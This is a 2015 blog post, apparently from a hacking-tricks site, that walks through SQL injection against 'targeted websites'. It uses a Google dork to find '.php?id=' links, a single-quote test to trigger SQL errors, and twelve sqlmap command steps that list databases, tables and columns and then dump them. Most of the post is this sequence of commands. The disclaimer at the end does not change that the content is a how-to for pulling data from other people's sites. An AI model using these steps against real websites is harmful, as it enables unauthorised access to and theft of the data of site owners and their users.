Monday, October 5, 2015

SQL INJECTION USING SQLMAP

This post is about using SQLMap, a tool for penetration testing. Once a website returns an SQL error, we can exploit that vulnerability using SQLMap. But first we need to find some vulnerable links on the targeted website.



HOW TO FIND AN SQL ERROR IN A TARGETED WEBSITE?


To get candidate links on a website, use Google dorks, for example: site: "Targeted website" inurl:.php?id= (without the double quotes). Once you get links matching this, open each link, put a single quote ( ' ) after it and check for the vulnerability. If the link is vulnerable, an SQL error will pop up, like this: (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1). This is just an example. An SQL error includes the word SQL, so you only have to check whether SQL is listed in it; it might also be a MySQL error, which is also part of SQL. If SQL appears somewhere in the error, the link is vulnerable.



Now the real game starts: exploiting that vulnerable link.


So now you need SQLMap. I will use it in Kali Linux (this OS is used by hackers). You can also use it on Windows, Mac or Ubuntu; the steps are the same on every OS.

Step 01 :- sqlmap -u "Vulnerable URL" and press enter


Step 02 :- Check whether the Vulnerable URL is injectable or not.


Here the URL is vulnerable, so I will get an injection point.

Step 03 :-  If you get any injection point, then choose the injection point that you want to apply.

Step 04 :- The injection points found by SQLMap are also saved at the location SQLMap specifies.
You can also copy the payload directly from SQLMap; here I will copy it directly from SQLMap.


Step 05 :- sqlmap -u "Vulnerable URL" --data "Paste the Payload here" and press enter


Step 06 :- sqlmap -u "Vulnerable URL" --data "Payload" --dbs (to get the available databases)


Step 07 :- Choose the database and fetch the tables.


Step 08 :- sqlmap -u "Vulnerable URL" --data "Payload" --tables -D chosen_database


Step 09 :- Now fetch the columns of the chosen tables.


Step 10 :- sqlmap -u "Vulnerable URL" --data "Payload" --columns -D chosen_database -T chosen_table


You can fetch multiple columns by adding a comma (,) between the column names.

Step 11 :- Get the data of all columns of chosen_table by dumping it.


Step 12 :- sqlmap -u "Vulnerable URL" --data "Payload" --dump -D chosen_database -T chosen_table


You now have the dump of the database.













NOTE:

Without prior permission from the developer or admin of the website or web application, it is illegal to test it for any vulnerability assessment.



Terms & Warning:

Use this post for educational purposes only and for your own knowledge.
The Pro Hack Tricks Blog Team, its author and admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember, no one is untraceable.







